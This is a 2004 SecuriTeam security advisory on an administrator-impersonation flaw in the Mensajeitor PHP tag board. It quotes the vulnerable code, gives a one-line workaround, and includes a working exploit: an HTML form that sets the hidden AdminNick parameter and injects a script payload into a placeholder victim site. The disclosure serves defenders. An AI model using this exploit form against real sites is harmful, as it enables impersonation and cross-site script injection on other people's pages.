[UNIX] Mensajeitor Inadequate Permissions Check
From: SecuriTeam (support_at_securiteam.com)
Date: 07/21/04
- Previous message: SecuriTeam: "[EXPL] Microsoft Windows POSIX Component Privilege Elevation (Exploit)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 21 Jul 2004 11:44:08 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Mensajeitor Inadequate Permissions Check
------------------------------------------------------------------------
SUMMARY
<http://www.mensajeitor.com/> Mensajeitor is "a kind of tag board, in
which the visitors can insert his nick and a message in the web page where
its installed". A vulnerability in the product allows an attacker to
impersonate a user from the administrative group and post notes to the web
site as if he was the administrator.
DETAILS
Vulnerable Systems:
* Mensajeitor version v1.8.9 r1 and prior
Vulnerable code:
for($i=0;$i<count($NicksRegs);$i++) {
list($admin_nick,$admin_pass) = explode(":",$NicksRegs[$i]);
if ($nick == $admin_nick) {
$cadena_final .= "<span class=\"admin\">".$nick."</span>";
$AdminNick = "si";
}
}
if ($AdminNick != "si") {
$cadena_final .= "<acronym
title='".nickinfo($nick_info)."'>$nick</acronym>";
}
As can be seen in the previous code, the default value for $AdminNick is
not given, and if both checks fails no value is set by the code. This
allows a remote attacker to set himself as part of the admin group by
simply providing a default value for the $AdminNick parameter. This opens
up the product to different types of attack, one of them is HTML and code
injection attacks.
Exploit:
< html>
< head>< title>Mensajeitor Exploit</title></head>
< body>
Inyeccion codigo en Mensajeitor =< v1.8.9 r1< br>< br>
< form name="form1" method="post"
action="http://www.victima.com/mensajeitor.php">
< input type="text" name="nick" size="10" value="Nick" maxlength="9"><
br>
< input type="text" name="titulo" size="21" value="Mensaje">< br>
< input type="text" name="url" size="21" value="http://">< br>
< input type="hidden" name="AdminNick" value="si">< br>
Introduce codigo a insertar (</table> debe incluirse al principio)<
br>
< input type="text" name="cadena_final" size="75%" value="</table><
script>alert('hacked ;)')</script>">< br>
< input type="submit" name="enviar" value="Enviar" class="form">< br>
</form>
MensajeitorPHP propiedad de aaff.< br>
By Jordi Corrales (Shell Security Group, http://www.shellsec.net)
</body></html>
Workaround:
Insert the following lines before $nick = htmlspecialchars($nick); found
in the source code of the PHP script:
if ($cadena_final) { unset($cadena_final); }
ADDITIONAL INFORMATION
The information has been provided by <mailto:jordi@shellsec.net> Jordi
Corrales.
The original article can be found at:
<http://www.shellsec.net/leer_advisory.php?id=4>
http://www.shellsec.net/leer_advisory.php?id=4
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[EXPL] Microsoft Windows POSIX Component Privilege Elevation (Exploit)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
- [NT] EMC Legato Networker DoS and Multiple Buffer Overflows
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... EMC Legato Networker DoS
and Multiple Buffer Overflows ... The vulnerability specifically exists due to improper
handling of ... is sent by an attacker, it is possible to overwrite portions of heap ...
(Securiteam) - [UNIX] IBM Informix Dynamic Server DBLANG Directory Traversal Vulnerability
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... IBM Informix Dynamic Server
DBLANG Directory Traversal Vulnerability ... Local exploitation of a directory traversal
vulnerability in IBM Corp.'s ... attacker can cause set-uid binaries to use Native
Language Support ... (Securiteam) - [NEWS] IBM Lotus Domino IMAP Buffer Overflow Vulnerability
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... IBM Lotus Domino IMAP Buffer
Overflow Vulnerability ... Remote exploitation of a buffer overflow vulnerability within
IBM Corp.'s ... This allows an attacker to take complete control of the compromised ...
(Securiteam) - [UNIX] Apache MyFaces Tomahawk JSF Framework Cross-Site Scripting (XSS)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... Apache MyFaces Tomahawk JSF
Framework Cross-Site Scripting (XSS) ... Remote exploitation of an input validation vulnerability
... an attacker to perform a cross-site scripting attack. ... (Securiteam) - [UNIX] phpSysInfo Multiple Vulnerabilities (HTTP_ACCEPT_LANGUAGE, sensor_program, VERSION, charset)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... Multiple vulnerabilities have
been discovered in phpSysInfo allowing ... the attacker to additionally inject the
$lng parameter. ... $sensor_program can *still* be used to inject active ... (Securiteam)
